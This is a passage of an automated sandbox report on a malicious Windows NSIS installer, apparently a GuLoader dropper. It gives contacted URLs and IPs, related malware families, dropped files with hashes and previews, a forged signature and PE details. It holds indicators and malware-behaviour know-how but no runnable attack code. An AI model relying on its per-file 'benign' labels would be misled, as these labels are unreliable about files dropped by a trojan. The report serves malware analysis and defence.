                                  https://apis.google.comfbXZ4ErQMU.exe, 00000003.00000003.53618132021.0000000006EA5000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511591295.0000000006E7A000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511638576.0000000006E99000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53058091433.0000000006E90000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53400172887.0000000006E5C000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53170207947.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53730137731.0000000006E5B000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://nsis.sf.net/NSIS_ErrorErrorfbXZ4ErQMU.exe, 00000000.00000000.51418151882.000000000040A000.00000008.00000001.01000000.00000003.sdmp, fbXZ4ErQMU.exe, 00000000.00000002.53290961705.000000000040A000.00000004.00000001.01000000.00000003.sdmp, fbXZ4ErQMU.exe, 00000003.00000000.52634286184.000000000040A000.00000008.00000001.01000000.00000003.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ocsp.quovadisoffshore.com0fbXZ4ErQMU.exe, 00000003.00000003.52719057837.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52951879609.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52726802352.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006EB8000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000002.56511770044.0000000006EBA000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52832764653.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057962046.0000000006EB9000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006EB7000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945627446.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839760041.0000000006EB2000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006EB7000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.gopher.ftp://ftp.fbXZ4ErQMU.exe, 00000003.00000001.52635170494.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://drive.google.com/ffbXZ4ErQMU.exe, 00000003.00000003.52952093836.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.53057812723.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52833039147.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52839942849.0000000006F09000.00000004.00000020.00020000.00000000.sdmp, fbXZ4ErQMU.exe, 00000003.00000003.52945802613.0000000006F09000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      142.250.64.193
                                      		drive.usercontent.google.comUnited States
                                      		15169GOOGLEUSfalse
                                      142.250.217.238
                                      		drive.google.comUnited States
                                      		15169GOOGLEUSfalse

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1569258
                                      Start date and time:2024-12-05 16:58:44 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 14m 5s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                      Run name:Suspected Instruction Hammering
                                      Number of analysed new started processes analysed:5
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:fbXZ4ErQMU.exe
                                      Detection:MAL
                                      Classification:mal68.troj.evad.winEXE@3/8@2/2
                                      EGA Information:
                                      • Successful, ratio: 50%
                                      HCA Information:
                                      • Successful, ratio: 81%
                                      • Number of executed functions: 48
                                      • Number of non-executed functions: 27
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                      • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • VT rate limit hit for: fbXZ4ErQMU.exe

                                      Simulations

                                      Behavior and APIs

                                      No simulations

                                      Joe Sandbox View / Context

                                      IPs

                                      No context

                                      Domains

                                      No context

                                      ASNs

                                      No context

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19Y5yNja2zy3.exeGet hashmaliciousGuLoaderBrowse
                                      • 142.250.64.193
                                      • 142.250.217.238
                                      DX7V71Ro7b.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                      • 142.250.64.193
                                      • 142.250.217.238
                                      upx_rufus.exeGet hashmaliciousUnknownBrowse
                                      • 142.250.64.193
                                      • 142.250.217.238
                                      dIPYIbWXs1.exeGet hashmaliciousGuLoaderBrowse
                                      • 142.250.64.193
                                      • 142.250.217.238
                                      sNifdpWiY9.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                      • 142.250.64.193
                                      • 142.250.217.238
                                      payload_1.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                      • 142.250.64.193
                                      • 142.250.217.238
                                      List of Required items xlsx.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                      • 142.250.64.193
                                      • 142.250.217.238
                                      ab.vbsGet hashmaliciousGuLoader, RHADAMANTHYSBrowse
                                      • 142.250.64.193
                                      • 142.250.217.238
                                      REQUEST FOR QUOATION AND PRICES 0106-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                      • 142.250.64.193
                                      • 142.250.217.238

                                      Dropped Files

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dlldIPYIbWXs1.exeGet hashmaliciousUnknownBrowse
                                        dIPYIbWXs1.exeGet hashmaliciousGuLoaderBrowse
                                          eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                            eAvqHiIsgR.exeGet hashmaliciousGuLoaderBrowse
                                              RFQ-24064562-SUPPLY-NOv-ORDER.com.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                LkzvfB4VFj.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  LkzvfB4VFj.exeGet hashmaliciousGuLoaderBrowse
                                                    z120X20SO__UK__EKMELAMA.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                      Quotation-GINC-19-00204.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Temp\nsjE6EA.tmp\System.dll

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):11776
                                                        Entropy (8bit):5.854450882766351
                                                        Encrypted:false
                                                        SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
                                                        MD5:34442E1E0C2870341DF55E1B7B3CCCDC
                                                        SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
                                                        SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
                                                        SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                        Joe Sandbox View:
                                                        • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                        • Filename: dIPYIbWXs1.exe, Detection: malicious, Browse
                                                        • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                        • Filename: eAvqHiIsgR.exe, Detection: malicious, Browse
                                                        • Filename: RFQ-24064562-SUPPLY-NOv-ORDER.com.exe, Detection: malicious, Browse
                                                        • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                        • Filename: LkzvfB4VFj.exe, Detection: malicious, Browse
                                                        • Filename: z120X20SO__UK__EKMELAMA.exe, Detection: malicious, Browse
                                                        • Filename: Quotation-GINC-19-00204.exe, Detection: malicious, Browse
                                                        Reputation:moderate, very likely benign file
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\Users\user\tranchet\Inured.Sti

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):455584
                                                        Entropy (8bit):2.656352367412479
                                                        Encrypted:false
                                                        SSDEEP:3072:ONKMH32ik+9vLI8uCpKGo+JpkP5rGopqtbuUf5j60:Oh32ik+9vXHpK5+JpkBrG+6buUf5j60
                                                        MD5:23117B3934A86E8695598259FB457193
                                                        SHA1:A93A91497D007EC9FEB500D6022272BE025A0CEF
                                                        SHA-256:7C0F10CFF86EA22DBF210D01EF43CB7C5BB6BF4ABAC18151D1D70FEC485FA8A4
                                                        SHA-512:6D89701A2A6E1D2089EA7EDA900D0F708F18BF419B048B6C4CCB2598D01C593FF7249E44C4B9C96F499EDF8E860A6D7D177D51817D091B410FE68C107E13B044
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:0000000036000000E60000009200004B4B4B006300808000009400D9D9D9008E000000F800BBBB00000000E10086000031310008080800000000ABAB00000000007000E60000E3E3003400000300242424004D000000560000F1F1F1F1F10000B2B200000000DC003F3F00494900BC004000000075757500002929000000DADA000600DFDFDFDF00001D000E000000DA0000BCBCBC001F1F008E8E000088001F00C3C30000F10000100000B500000000A7A7A7A7A70059008400000000CDCDCD00002C2C0032323200A40000002C0000000049000000000C0C0C002D006400EC00DDDDDD0000A100C00000000056008E00450000000000000100AC002D2D00000000780048000300C4C4C4C4C4004B0000B4B4B4B400CF000000CA009700000F0F00AC0000005B5B00000000D800870000005F5F5F0061008787878787878700008A0000000000000000000000D4000000CB0000FD001900F6F6F6F600000A00C5C500F6F6000000000000000707070700480000000000A6A600005D5D5D0000009C00BCBCBCBC00353500C6C60000000000007B7B009000AAAA0000C7C7C700000000FAFA00F1006868680023232300CA00007D7D7D000086000A00979797979797970000A70000220000009A0000810000787800005A000000000000200046464600000000E000000000000036000000D90000

                                                        C:\Users\user\tranchet\Poddle.Awa

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):229378
                                                        Entropy (8bit):7.492569922983724
                                                        Encrypted:false
                                                        SSDEEP:3072:Tq6BlW6gYV7fcXEjHoHv/0TQPEQjtZoL9VWToGyQV6U7HTehRHsWL83:TqslW6LV7UXSoPsbQjtkFGTeUl3
                                                        MD5:BB8D669BD88B3093874F7BF94B0D5746
                                                        SHA1:CAA0D57B29D39044BD4D003086D370F6666A8F5A
                                                        SHA-256:E7911C7E36701424FB672BE8FDB7E13F66197E1B14841740A24821B98CB1D510
                                                        SHA-512:E959EB6F2A45146DF2BFD26618A5A6567DCFE4B43643637B5429E5BED24112D340B42DD2CCC2A5BB2D95C6F862A7AF68079AD77E9B6672257B9EED39C8BD91F6
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:.....666666.^^..............ee...........m....2.......aaaaaa.7...........M............................aaa._.||..b...9....@.^.......'..tt.....S.............................l......ss.555555............S...............l....h..............RRRR....1.........X..pp.....V.K.........FFF..........................1..................>>....i.R...!!!.............I.QQ........................................eee....................................----...................................................'.....5.....5..#...ww........................n.......999.k.iiiii......,,.^^.JJJ...........].....ee.W.TT.....K................W.,................VVV.n............................................D.....................................j......|...YY.XX............2.....www............ZZ.P...........|||||.....................;.2..I..............P.FF.[............\.......................ee.........................???......................................A...........@@.....#.G..'.........................IIII....F.

                                                        C:\Users\user\tranchet\computerskrmen.dem

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):485127
                                                        Entropy (8bit):1.2565961974341746
                                                        Encrypted:false
                                                        SSDEEP:768:bgBMgq+aLnwfPnz/Km1iLGyDPiU55NCk+T93YpnK77oTpvYP3knePjlW0kwNGL+q:XQ3wvosOsCpxFJrXSBmHzTu58UR
                                                        MD5:580D05E679E74B036B55CA8E5FF32769
                                                        SHA1:10175C43AB7B725FFFCF770EB2C3555E91D3BA13
                                                        SHA-256:B3E34975017C193D4672BEC42BC52B55F8AE1F1D5F30D56DCFD0B3A4242C3BE4
                                                        SHA-512:0E26F0084BED372785A5E8C8BE3A0717074AA52C2E8B5413FA9F2CB8DEED40BF8BDBF15C411EFFA432A8B96E50AE6085E8F90A97350827AFAA1BE1AB4B3E1643
                                                        Malicious:false
                                                        Reputation:moderate, very likely benign file
                                                        Preview:.................3.........................................=.....................................`.............................................................................n........................... .L.........................(,.b...e.......\...............................u.....................[.............................n........................[........................................c...........................W...........................................................*..].h.............R..............................................*............................^.....$.....w...................................................p...............................................................$.t...................................w*....................b....E.......................|.............5.......E................................................P.........d..................vl...........}..."..................................1.............................k.....7...............

                                                        C:\Users\user\tranchet\predictors.dut

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):389868
                                                        Entropy (8bit):1.2469892412772452
                                                        Encrypted:false
                                                        SSDEEP:768:8mGX5iY6YFC1hSNYG8n6aCKBHwcX7e3ZNrt7qNIxKpGEopKfWOO72cDEDQ+7IF5i:m5ittaAwW6q8KH13QyOgs2w
                                                        MD5:2A500E1219C4894E2D45C32C5A5A11FD
                                                        SHA1:AC9A88DE4C84E1EB8A535E1061CBC6584380D24E
                                                        SHA-256:C65F223375C6DFE8CE71213D5DD24F39CDE31F772D2C66521BF07B21BE45E6C1
                                                        SHA-512:89ED91AF91CF969FE7EC087EE107B52959582615EFB2AB72A21D6C3820E5BDDA78EE02EB39BB323FD996D85510627387616DF8917B12052A62D288D8E9448596
                                                        Malicious:false
                                                        Preview:...........................E.....................................................................<......................].....f........................_...G..........S....................................@...............j...................................................I...................|..C..........................................................d......%t..........N..................d...Q...........p....3..........................................L...........y...............................-........................................................................@.........]..3........A................................*............................................................................................@...........(............................{..4......................................k.................{.....................W.................,......+...............K....b.......................!.............................H..)..........................E..........................

                                                        C:\Users\user\tranchet\receptionssekretrer.bin

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):442363
                                                        Entropy (8bit):1.2533707838755617
                                                        Encrypted:false
                                                        SSDEEP:1536:f6KFImN7hPg1fMcZ9pkK6m1rmkrDAji7VW9EgfrY:PyMtabPE+7ctfM
                                                        MD5:5465B75724C031B21C018F7D72941F72
                                                        SHA1:98176B27A41A35401A96D0AAC0859EEC25A4C5FE
                                                        SHA-256:7390780C6FB1F7B57C950A11AE287127CB6144CE9AD1C26E8C242BADB685729B
                                                        SHA-512:7084191B13FF854943DEE9FB6DDC1D7F89D06055FF4DA7E04DA1C359B557AC22762209B8DFE061F3AF628DF077E1D1D1009E9F9A18E3C9441AEE7FD4FDFF1688
                                                        Malicious:false
                                                        Preview:.........................................................................|......................................v..g..................................................................C...........`.......................................... ...............#.....................K..0.................\................................4.......................................y...................."........k..............9.H.................................................................."...........m............................6...................................................E..)..........[..............TZ..............Q............_...........$...... ..........................W....................................................y..................................q......!.................................... .....................o..........*........................................................................[..............9..................s....;..........................................

                                                        C:\Users\user\tranchet\serenissimi.txt

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):521
                                                        Entropy (8bit):4.284169749449499
                                                        Encrypted:false
                                                        SSDEEP:12:7+SriF8i+WUQDJBYqRIE47W0BvM71ARi9ulhji4JDQCr6K:7tuZ+d6/GEUI18jhJsCr6K
                                                        MD5:B089BD0CBC944DE0B1023E6CE9318BD3
                                                        SHA1:715FA74E243D5C3419519E7371ED1836C9BCFA4A
                                                        SHA-256:1E8ABB4A5E85595B0EF2FC73E9012EDDFE1BCB7363E90A2EA46F561DD3742F93
                                                        SHA-512:A164EB2AB02E612E9F96531006C4A71B8D6E8EA6444D86907CB15EF2C1AAB4680EAF3BB580C6A1D5B89A3F454F3E532242FC1DE2B71A9FFF56F812F6E4638885
                                                        Malicious:false
                                                        Preview:dibasic skinnebenssaarenes rembrandt unembayed timerne ependytes overtorturing.ruskindenes cellemembranen visirs daarligste bartholomeuss eslabon trflen communizations karikaturtegners forsgsstadiet hillocked..perfumers afplukker simonized jubilumsmiddags dolktids spokane milliontedel indfoertes dour..margented pomerans semicylindrical skifferolies kernerelationerne univalent,tiltrdelsesforelsning hydrion caggy stabejserne figurist vt klutzier bendy hanekamme..duilin molompi cuartino fornagl tortricoidea unhurrying.

                                                        C:\Windows\Arder.lnk

                                                        Download File
                                                        Process:C:\Users\user\Desktop\fbXZ4ErQMU.exe
                                                        File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                        Category:dropped
                                                        Size (bytes):734
                                                        Entropy (8bit):3.2819121006350698
                                                        Encrypted:false
                                                        SSDEEP:12:8wl01sXUCTGlnEEqEu3w/g/rNJkKAh4t2YCBTo8:82svqo/45HALJT
                                                        MD5:77093B00B23F98CBA6C0D1C948350193
                                                        SHA1:D8DB917CC95435D80B446AA38B623377B39D9E18
                                                        SHA-256:ABEC3A36956C827AE67D077F005B6CEAA616B58A4BE7202DEAC7058936AE8042
                                                        SHA-512:FB8659401E24C2445B4718338E6FDEBD55A0CD2A783EAB278845582E959A2CB03E06C1D30E8144998819A8DA71129B4E58D1395122E4988E08EC71F6CF6B9D92
                                                        Malicious:false
                                                        Preview:L..................F........................................................?....P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................A.r.t.h.u.r.....l.2...........Disannex.And37..N............................................D.i.s.a.n.n.e.x...A.n.d.3.7.............\.U.s.e.r.s.\.A.r.t.h.u.r.\.D.i.s.a.n.n.e.x...A.n.d.3.7.$.C.:.\.U.s.e.r.s.\.A.r.t.h.u.r.\.t.r.a.n.c.h.e.t.\.T.r.y.k.m.a.a.l.e.r.e.........(.................l^".`G...3..qs................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.4.2.5.3.1.6.5.6.7.-.2.9.6.9.5.8.8.3.8.2.-.3.7.7.8.2.2.2.4.1.4.-.1.0.0.1.................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.5537524720559555
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:fbXZ4ErQMU.exe
                                                        File size:901'168 bytes
                                                        MD5:c58b26e27e2d9aa8080e289445e1c8ca
                                                        SHA1:50dc9a8d9735a94a18cf3b35cb3c88217b3d05cd
                                                        SHA256:9201c98d765025cad9fcbe9095c1f34960b641d38c6a4e999720a0c3c129353f
                                                        SHA512:e5fae7426e750146275dc91004378503555d068bcf60446d9b4ed1a082a95889fb1cfdf05f857a1d454681763bf24454f27410cd8086faed75edc2fa157a301c
                                                        SSDEEP:24576:yiGFaq43NvCl4+wlZdujTrlsJAvOnMJ/QOea:yiGFu3NvIwSdsJUCMJ/qa
                                                        TLSH:4B151262F600D9AAD4318F718DAFD196EAD17E2528650B8B7F9D7B2FACB1050C10F225
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L... ..`.................f...|......H3............@

                                                        File Icon

                                                        Icon Hash:0e13672535353f1c

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x403348
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x60FC9220 [Sat Jul 24 22:20:16 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:ced282d9b261d1462772017fe2f6972b

                                                        Authenticode Signature

                                                        Signature Valid:false
                                                        Signature Issuer:CN="Genfundet Klimaeksperter trichloromethyl ", E=frsteviolinerne@Spayad.Nat, L=Puls, S=Schleswig-Holstein, C=DE
                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                        Error Number:-2146762487
                                                        Not Before, Not After
                                                        • 03/03/2024 03:35:28 03/03/2027 03:35:28
                                                        Subject Chain
                                                        • CN="Genfundet Klimaeksperter trichloromethyl ", E=frsteviolinerne@Spayad.Nat, L=Puls, S=Schleswig-Holstein, C=DE
                                                        Version:3
                                                        Thumbprint MD5:7F4300F89CB33F3547D88A3CF12D3064
                                                        Thumbprint SHA-1:6744129A179DDD70100E4EF2E477E7017324962E
                                                        Thumbprint SHA-256:F5A72CA616B49A6ACBAA0063F9BC40694B0F283A502262C92A5E0E69F2EE0F0F
                                                        Serial:2CC20419A347B6321BC816E32297152DFB393513

                                                        Entrypoint Preview

                                                        Instruction
                                                        sub esp, 00000184h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+18h], ebx
                                                        mov dword ptr [esp+10h], 0040A198h
                                                        mov dword ptr [esp+20h], ebx
                                                        mov byte ptr [esp+14h], 00000020h
                                                        call dword ptr [004080B8h]
                                                        call dword ptr [004080BCh]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042F42Ch], eax
                                                        je 00007F0D889D8723h
                                                        push ebx
                                                        call 00007F0D889DB886h
                                                        cmp eax, ebx
                                                        je 00007F0D889D8719h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082A0h
                                                        push esi
                                                        call 00007F0D889DB802h
                                                        push esi
                                                        call dword ptr [004080CCh]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], bl
                                                        jne 00007F0D889D86FDh
                                                        push 0000000Bh
                                                        call 00007F0D889DB85Ah
                                                        push 00000009h
                                                        call 00007F0D889DB853h
                                                        push 00000007h
                                                        mov dword ptr [0042F424h], eax
                                                        call 00007F0D889DB847h
                                                        cmp eax, ebx
                                                        je 00007F0D889D8721h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F0D889D8719h
                                                        or byte ptr [0042F42Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408038h]
                                                        push ebx
                                                        call dword ptr [00408288h]
                                                        mov dword ptr [0042F4F8h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+38h]
                                                        push 00000160h
                                                        push eax
                                                        push ebx
                                                        push 00429850h
                                                        call dword ptr [0040816Ch]
                                                        push 0040A188h

                                                        Rich Headers

                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x85440xa0.rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x580000x41dd0.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xdac500x13e0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x10000x64570x6600f6e38befa56abea7a550141c731da779False0.6682368259803921data6.434985703212657IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata0x80000x13800x1400569269e9338b2e8ce268ead1326e2b0bFalse0.4625data5.2610038973135005IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data0xa0000x255380x60017edd496e40111b5a48947c480fda13cFalse0.4635416666666667data4.133728555004788IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata0x300000x280000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc0x580000x41dd00x41e0051f103b856396aac282c5bd5a24beff1False0.6063619248102466data5.8960782160116745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                        RT_ICON0x583b80x130caPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.998410786148207
                                                        RT_ICON0x6b4880x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.40775464332189754
                                                        RT_ICON0x7bcb00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.4554866512507883
                                                        RT_ICON0x851580x67e8Device independent bitmap graphic, 80 x 160 x 32, image size 26560EnglishUnited States0.462218045112782
                                                        RT_ICON0x8b9400x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4729667282809612
                                                        RT_ICON0x90dc80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.46835144071799717
